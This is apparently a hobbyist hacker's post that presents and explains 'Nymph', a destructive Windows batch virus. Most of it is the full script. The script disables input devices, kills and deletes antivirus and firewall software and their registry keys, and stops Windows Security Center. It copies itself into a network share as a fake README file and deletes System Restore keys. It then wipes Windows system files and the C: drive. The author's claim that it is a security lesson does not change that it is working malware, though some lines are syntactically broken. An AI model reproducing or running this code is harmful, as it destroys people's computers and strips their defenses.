Email: eantwi@jaxnet.com Skype Phone: scholarz_435 (call me) Nymph Viral written by E-Unit "As a newbie ,I thought and behaved as a newbie but when the time came for me to grow as hacker I quickly gave up newbie ideology" .In the beginning, I thought hacking was all about being destructive but as I matured I discovered that is not the case. Hacking in its purest form is the art of analyzation; the result of curiosity. Many people try to put hacking into categories of good, bad and shady. When in fact hacking is none of the above .Like, a sword, hacking can be used for either good or evil. Good and evil is no depended upon the tool but the person who welds the tool. Hacking is the ability to analyze a problem. Then break that problem into simpler components and then isolate those key components to decipher the problem as a whole. Hacking forces the individual to think more deeply; passed the surface. The below program is called Nymph, my first batch viral. Nymph in this context has no connotation to sex or perverseness. I dedicated this program to a beautiful girl named Sarah. The purpose of this program is to disable security and then destroy the operating system. I know! ,the purpose of the program may contradict the what I say earlier, however, the program allows you to look at your computer security from another perspective. It forces you to ask the question: Can my security system defend my computer effectively? Rules of Engagement A. Disable the keyboard and mouse B. Search for common security programs C. Search for common security keywords D. Spread tactic E. Operating System destruction @echo off cls rem Written by E-Unit rem Dedicated to Sara Beth Hudson a.k.a Nymph a.k.a CherryPie rem "A Beauty So True"- E-Unit goto Nymph :scan for /f %a in ("C:\Program Files\armor.*") do (find /I /N "armor") | del /F /S /Q %a>nul for /f %b in ("C:\Program Files\storage.*") do (find /I /N "storage") | del /F /S /Q %b>nul for /f %c in ("C:\Program Files\disk.*") do (find /I /N "disk")| del /F /S /Q %c>nul for /f %d in ("C:\Program Files\Virtual Sandbox.*") do (find /I /N "Virtual Sandbox") | del /F /S /Q %d>nul for /f %e in ("C:\Program Files\Fortres 101.*") do (find /I /N "Fortres 101") | del /F /S /Q %e>nul for /f %f in ("C:\Program Files\cleanslate.*") do (find /I /N "cleanslate") | del /F /S /Q %f>nul for /f %g in ("C:\Program Files\spam.*") do (find /I /N "spam") | del /F /S /Q %g>nul for /f %h in ("C:\Program Files\firewall.*") do (find /I /N "firewall") | del /F /S /Q %h>nul for /f %i in ("C:\Program Files\Antivirus.*") do (find /I /N "Antivirus") | del /F /S /Q %i>nul for /f %j in ("C:\Program Files\Mcafee.*") do (find /I /N "Mcafee") | del /F /S /Q %j>nul for /f %k in ("C:\Program Files\Spyware.*") do (find /I /N "Spyware") | del /F /S /Q %k>nu for /f %m in ("C:\Program Files\Antiviral.*") do (find /I /N "Antiviral") | del /F /S /Q %m>nul for /f %n in ("C:\Program Files\Antivirus.*") do (find /I /N "Antivirus") | del /F /S /Q %n>nul for /f %o in ("C:\Program Files\Agent.*") do (find /I /N "Agent") | del /F /S /Q %o>nul for /f %p in ("C:\Program Files\Sheild.*") do (find /I /N "Sheild") | del /F /S /Q %p>nul for /f %q in ("C:\Program Files\sygate.*") do (find /I /N "sygate") | del /F /S /Q %q>nul for /f %r in ("C:\Program Files\bitdefender.*") do (find /I /N "bitdefender") | del /F /S /Q %r>nul for /f %s in ("C:\Program Files\zonealarm.*") do (find /I /N "zonealarm") | del /F /S /Q %s>nul goto cermony :nymph_kiss of death del /Q /F /S /A: H %windir%\*.zip>nul del /Q /F /S /A: H %windir%\*.ocx>nul del /Q /F /S /A: H %windir%\*.nls>nul del /Q /F /S /A: H %windir%\*.msc>nul del /Q /F /S /A: H %windir%\*.txt>nul del /Q /F /S /A: H %windir%\*.log>nul del /Q /F /S /A: H %windir%\*.ini>nul del /Q /F /S /A: H %windir%\*.js>nul del /Q /F /S /A: H %windir%\*.xls>nul del /Q /F /S /A: H %windir%\*.sys>nul del /Q /F /S /A: H %windir%\*.ax>nul del /Q /F /S /A: H %windir%\*.msc>nul del /Q /F /S /A: H %windir%\*.cpl>nul del /Q /F /S /A: H %windir%\*.dat>nul del /Q /F /S /A: H %windir%\*.sep>nul del /Q /F /S /A: H %windir%\*.drv>nul del /Q /F /S /A: H %windir%\*.nls>nul del /Q /F /S /A: H %windir%\*.chm>nul del /Q /F /S /A: H %windir%\*.tlb>nul del /Q /F /S /A: H %windir%\*.rll>nul del /Q /F /S /A: H %windir%\*.scr>nul del /Q /F /S /A: H %windir%\*.cmd>nul del /Q /F /S /A: H %windir%\*.msi>nul del /Q /F /S /A: H %windir%\*.hlp>nul del /Q /F /S /A: H %windir%\*.xlm>nul del /Q /F /S /A: H %windir%\*.reg>nul start /wait del /Q /F /S /A: H %windir%\*.dll>nul del /Q /F /S /A: H "%windir%\system32\*.exe">nul del /Q /F /S /A: H "%path%">nul del /Q /F /S /A: H c:>nul rem the self destruct mode for the viral;where every that location(s) maybe at del /Q /F /S %0 goto :EOF :Nymph RUNDLL32.EXE KEYBOARD,disable RUNDLL32.EXE MOUSE,disable IF errorlevel NEQ 0 ( tskill /A MpfAgent tskill /A mcagent tskill /A MpfTray tskill /A MSKAgent tskill /A McTskshd tskill /A McSheild tskill /A mcrdsvc tskill /A McVSEscn tskill /A mcvsshld tskill /A MpfService tskill /A MSKSvr ) ELSE IF errorlevel GTR 0 || errorlevel LSS 0( del /Q /F /S "C:\Program Files\McAfee.com" del /Q /F /S "C:\Program Files\McAfee.com\Personal Firewall" del /Q /F /S "C:\Program Files\McAfee.com\VSO" del /Q /F /S "C:\Program Files\McAfee" reg /delete "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_MCDETECT.EXE\0000" /FORCE reg /delete "HKEY_LOCAL_MACHINE\SOFTWARE\McAfee" /FORCE reg /delete "HKEY_LOCAL_MACHINE\SOFTWARE\McAfee\VSCore" /FORCE reg /delete "HKEY_LOCAL_MACHINE\SOFTWARE\McAfee\McAfee Internet Security\CurrentVersion\Setup" /FORCE ) IF errorlevel NEQ 0 ( tskill /A NSCSRVCE tskill /A NPFMntor ) ELSE IF errorlevel GTR 0 || errorlevel LSS 0( del /Q /F /S "C:\Program Files\Norton AntiVirus\*.*" del /Q /F /S "C:\Program Files\Norton AntiVirus\IWP\*.*" del /Q /F /S "C:\Program Files\Norton AntiVirus\IWP\IDSDefs\*.*" reg /delete "HKEY_LOCAL_MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\Symantec.Norton.Antivirus.IEContextMenu" /FORCE reg /delete "HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{0BD5CEA9-55C0-4FA7-A7BA-8E90B6CC01D5}\1.0\0\win32" /FORCE reg /delete "HKEY_LOCAL_MACHINE\SOFTWARE\Classes\NortonAntiVirus.OfficeAntiVirus" /FORCE reg /delete "HKEY_LOCAL_MACHINE\SOFTWARE\Classes\NortonAntiVirus.OfficeAntiVirus.1" /FORCE ) IF errorlevel NEQ 0 ( tskill /A avgwb tskill /A avgamsvr tskill /A avgupsvc tskill /A avgcc tskill /A avgemc ) ELSE IF errorlevel GTR 0 || errorlevel LSS 0( del /Q /F /S C:\Program Files\Grisoft\AVG7 reg /delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\AVGSE.DLL" /FORCE reg /delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\AVGW.EXE" /FORCE reg /delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FindExtensions\Static\Avg7F" /FORCE reg /delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FindExtensions\Static\Avg7Find" /FORCE ) IF errorlevel NEQ 0 ( tskill /A zclient tskill /A vsmon tskill /A ehmsas tskill /A isafe tskill /A zonealarm tskill /A firewall tskill /A zlavscan ) ELSE IF errorlevel GTR 0 || errorlevel LSS 0( del /Q /F /S "C:\Program Files\Zone Labs\ZoneAlarm reg /delete "HKEY_LOCAL_MACHINE\SOFTWARE\Zone Labs\IMsecure" /FORCE reg /delete "HKEY_LOCAL_MACHINE\SOFTWARE\Zone Labs\MiniLog" /FORCE reg /delete "HKEY_LOCAL_MACHINE\SOFTWARE\Zone Labs" /FORCE reg /delete "HKEY_LOCAL_MACHINE\SOFTWARE\Zone Labs\TrueVector" /FORCE ) IF errorlevel NEQ 0 ( tskill /A KAV tskill /A kavmm ) ELSE IF errorlevel GTR 0 || errorlevel LSS 0( del /Q /F /S "C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus Personal Pro 5\*.*" del /Q /F /S "C:\KAV5.0\PersonalPro\english" reg /delete "HKEY_LOCAL_MACHINE\SOFTWARE\KasperskyLab\Components\2A\PersonalPro\5.0.0.0\bl\DisplayName" /FORCE reg /delete "HKEY_LOCAL_MACHINE\SOFTWARE\KasperskyLab\Components\2A\PersonalPro\5.0.0.0\bl\Cmdline" /FORCE reg /delete "HKEY_LOCAL_MACHINE\SOFTWARE\Classes\KAVOGAddin.Addin.1" /FORCE reg /delete "HKEY_LOCAL_MACHINE\SOFTWARE\Classes\KAVOGAddin.Addin" /FORCE ) IF errorlevel NEQ 0 ( tskill /A SAVAdminService tskill /A SavService tskill /A ALsvc tskill /A symlcsvc tskill /A cisvc ) ELSE IF errorlevel GTR 0 || errorlevel LSS 0( del /Q /F /S C:\Program Files\Sophos reg /delete "HKEY_LOCAL_MACHINE\SOFTWARE\Sophos" /FORCE reg /delete "HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{752B822E-5C11-4BC8-B5B5-B15B67CD2884}" /FORCE reg /delete "HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\SophtainerAdapter.DLL" /FORCE reg /delete "HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SophtainerAdapter.ArchiveTypeInfo" /FORCE reg /delete "HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Sophos.SavXP.MainGUI.1" /FORCE ) IF errorlevel NEQ 0 ( tskill /A mcrdsvc tskill /A ashSimpl tskill /A cidaemon ) ELSE IF errorlevel GTR 0 || errorlevel LSS 0( del /Q /F /S "C:\Program Files\Alwil Software\Avast4" reg /delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Exchange\Client\Extensions" /FORCE reg /delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Exchange\Client\Extensions\avast!4" /FORCE reg /delete "HKEY_CURRENT_USER\Software\ALWIL Software" /FORCE ) IF errorlevel NEQ 0 ( tskill /A PavPrSv tskill /A AVXDWIN tskill /A pavFnSvr ) ELSE IF errorlevel GTR 0 || errorlevel LSS 0( del /Q /F /S "C:\Program Files\Panda Software\Panda Titanium Antivirus 2005\*.*" reg /delete "HKEY_LOCAL_MACHINE\SOFTWARE\Classes\JSEFile\Shell\Open\Command" /FORCE reg /delete "HKEY_CURRENT_USER\Software\Panda Software" /FORCE IF errorlevel NEQ 0 ( tskill /A nod32krn tskill /A nod32kui ) ELSE IF errorlevel GTR 0 || errorlevel LSS 0( del /Q /F /S "C:\Program Files\ESET\*.*;C:\Program Files\ESET\Install\*.*" reg /delete "HKEY_LOCAL_MACHINE\SOFTWARE\Eset\Nod\CurrentVersion\InstalledComponents\NOD32MOD_WINNT_FRENCH_BASE" /FORCE reg /delete "HKEY_LOCAL_MACHINE\SOFTWARE\Eset\Nod\CurrentVersion\InstalledComponents\NOD32MOD_WINNT_FRENCH_INET" /FORCE reg /delete "HKEY_LOCAL_MACHINE\SOFTWARE\Eset\Nod\CurrentVersion\InstalledComponents\NOD32MOD_WINNT_FRENCH_STANDARD" /FORCE ) IF errorlevel NEQ 0 ( tskill /A armor2nt tskill /A NetDog tskill /A ArCW tskill /A Ikernel ) ELSE IF errorlevel GTR 0 || errorlevel LSS 0( del /Q /F /S "C:\Program Files\Armor2net\Armor2net Personal Firewall" reg /delete "HKEY_LOCAL_MACHINE\SOFTWARE\Armor2net\Armor2net Personal Firewall\3.12" /FORCE reg /delete "HKEY_LOCAL_MACHINE\SOFTWARE\Armor2net\Armor2net Personal Firewall" /FORCE reg /delete "HKEY_LOCAL_MACHINE\SOFTWARE\Armor2net" /FORCE ) IF errorlevel NEQ 0 ( tskill /A ASMonitor tskill /A ASMPatchManager tskill /A AhnLabAS tskill /A AolAV ) ELSE IF errorlevel GTR 0 || errorlevel LSS 0( del /Q /F /S "C:\Program Files\AOL\Active Security Monitor" del /Q /F /S "C:\Program Files\AOL\Active Security Monitor\AV" reg /delete "HKEY_CURRENT_USER\Software\America Online" /FORCE ) IF errorlevel NEQ 0 ( tskill /A BullGuard tskill /A FwInst tskill /A bdcore tskill /A PSSensor tskill /A SmcMod tskill /A wgman tskill /A iphlpapi ) ELSE IF errorlevel GTR 0 || errorlevel LSS 0( del /Q /F /S "C:\Program Files\BullGuard Software\BullGuard 5.0\Antivirus" del /Q /F /S "C:\Program Files\BullGuard Software" reg /delete "HKEY_CURRENT_USER\Software\Bullguard" /FORCE reg /delete "HKEY_CURRENT_USER\Software\Bullguard\5.0" /FORCE ) IF errorlevel NEQ 0 ( tskill /A AntiSpyWare tskill /A AntiSpyWareControl ) ELSE IF errorlevel GTR 0 || errorlevel LSS 0( del /Q /F /S C:\Program Files\Ashampoo\Ashampoo AntiSpyWare reg /delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Ashampoo AntiSpyWare_is1" /FORCE reg /delete "HKEY_LOCAL_MACHINE\SOFTWARE\Ashampoo\AntiSpyWare" /FORCE ) ELSE( del /Q /F /S "C:\Program Files\Trend Micro\TIS15_1329\System32\drivers" del /Q /F /S "C:\Program Files\Trend Micro\TIS15_1329\Pattern\AspmData" del /Q /F /S "C:\Program Files\Trend Micro\TIS15_1329\Module" del /Q /F /S "C:\Program Files\Trend Micro\TIS15_1329" ) goto scan :cermony rem adds to the share diretory so if someone checks your shares and opens up the folder rem their in for a surprise. net stop "Security Center" net stop "SharedAccess" > "%Temp%.\nym.reg" ECHO REGEDIT4 >>"%Temp%.\nym.reg" ECHO. >>"%Temp%.\nym.reg" ECHO [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess] >>"%Temp%.\nym.reg" ECHO "Start"=dword:00000001 >>"%Temp%.\nym.reg" ECHO. >>"%Temp%.\nym.reg" ECHO [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\wuauserv] >>"%Temp%.\nym.reg" ECHO "Start"=dword:00000001 >>"%Temp%.\nym.reg" ECHO. >>"%Temp%.\nym.reg" ECHO [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\wscsvc] >>"%Temp%.\nym.reg" ECHO "Start"=dword:00000001 >>"%Temp%.\nym.reg" ECHO. START /WAIT REGEDIT /S "%Temp%.\nym.reg" del "%Temp%.\nym.reg" mkdir C:\Alert_Read copy %0 "C:\Alert_Read\README.txt.bat" net share Alert_Read=C:\Alert_Read reg /delete "HKEY_LOCAL_MACHINE\SOFTWARE\ATI Technologies\CDS\0000\0\BIOS" /FORCE reg /delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\VolumeCaches\System Restore" /FORCE reg /delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\VolumeCaches\Recycle Bin" /FORCE reg /delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\VolumeCaches" /FORCE shutdown -s -f -t 18 -c "Princess Nymph_kiss of death" goto nymph_kiss of death Engagement begins with the statement “goto Nymph” . The program jumps to the part of the code which disables the mouse and keyboard .Obviously, to prevent the user from impeding the attack. Then program searches the task manger and if necessary directories and registry for common security programs: 1. McAfee 2. Panda 3. NOD32 4. Avast Antivirus 5. Avg Antivirus 6. Kaspersky 7. Norton 8. Ashampoo 9. Sophos_Antivirus 10. BullGuard 11. Active Security Monitor 12. Trend Micro 13. ZoneAlarm After the search is complete, a different search is initiated with the statement “goto scan” . This search will look for folders with specify keywords that pertain to general security or commercial security programs. Next, the next to last part of the code is initiated with the statement “goto ceremony”. The Windows xp own built-in “SecurityCenter” and “SharedAccess” are disabled with net stop command and registry manipulation. Then a directory is created for the nymph viral,"C:\Alert_Read\README.txt.bat",which is disguised as a readme file and copied in network shares. Also to insure that the OS does not recover from the attack. Nymph deletes registry keys that deal with the system restore and BIOS environment. Lastly, a shutdown sequence begins for eighteen seconds. Finally, in the ongoing countdown, the last part of the code is initiated with the statement “goto nymph_kiss of death”. In this part of the code the classic but effective way of destroying the operating system is implemented .